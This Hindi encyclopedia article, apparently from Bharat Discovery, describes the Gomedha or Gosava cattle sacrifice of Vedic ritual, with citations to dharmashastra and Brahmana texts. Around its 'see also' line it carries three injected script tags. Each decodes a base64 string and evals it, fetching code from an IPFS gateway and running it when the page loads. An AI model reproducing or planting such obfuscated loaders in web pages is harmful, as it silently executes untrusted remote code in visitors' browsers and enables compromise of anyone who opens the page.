गोमेध

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

गोमेध एक विशेष प्रकार का यज्ञ है। इस यज्ञ में गौ (गाय) का आलंभन[1] किया जाता है, अत: इसके लिये 'गवालंभ' शब्द भी प्रयुक्त होता है। पहले अनेक अवसरों पर 'गो' या 'वृष' का वध किया जाता था।[2] मधुपर्क में गौवध भी बहुधा कहा गया है।[3]

  • श्राद्ध में भी गौवध का प्रसंग है। शूलगव में भी वृषवध उल्लिखित हुआ है।[4]बाद में ये कर्म कलिवर्ज्य मान लिए गए।[5]
  • 'गोमेध' या 'गोसव' के विशिष्ट विवरण अनेकत्र हैं, जिससे यह निश्चित होता है कि प्राचीन काल में यज्ञ में गौवध वैध रूप से किया जाता था। बाद में हानि देखकर क्रमश: यह प्रथा त्याज्य हो गई।
  • 'चरकसंहिता' सदृश प्रामाणिक ग्रंथ में यज्ञीय गौवध पर कहा गया है कि- "पृष्घ्रा ने पहले गौवध किया था"।[6]
  • गोमेध और पशु यज्ञसंबंधी विशिष्ट तथ्य इतिहास तथा पुराणों में हैं और पूर्वव्याख्याकारों ने उसे 'गौपशु' का साक्षात्‌ वध ही माना है।
  • एक गोसव नामक एकाह सोमयज्ञ है।[7]इस यज्ञ का विचित्र वर्णन है। वत्सर पर्यंत इस कर्म को करने वाला पशुव्रत पदवाच्य होता है।[8]गोसव संबंधी विवरण 'यज्ञतत्वप्रकाश' में द्रष्टव्य है।[9]


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>इन्हें भी देखें<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>: अश्वमेध यज्ञ, पंच महायज्ञ, वाजपेय एवं राजसूय यज्ञ<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. वध, हिंसा, हत्या
  2. हिस्ट्री ऑव धर्मशास्त्र, भाग 2, पृ. 627
  3. हिस्ट्री ऑव धर्मशास्त्र, भाग 2, पृ. 543-545
  4. हिस्ट्री ऑव धर्मशास्त्र, भाग 2, पृ.831-532
  5. हिस्ट्री ऑव धर्मशास्त्र, भाग 3, पृ. 939-940
  6. गोमेध (हिन्दी)। । अभिगमन तिथि: 26 फ़रवरी, 2014।
  7. तैत्तिरीय ब्राह्मण 2/7/6
  8. आश्वलायन श्रौतसूत्र
  9. यज्ञतत्वप्रकाश, पृ. 124

संबंधित लेख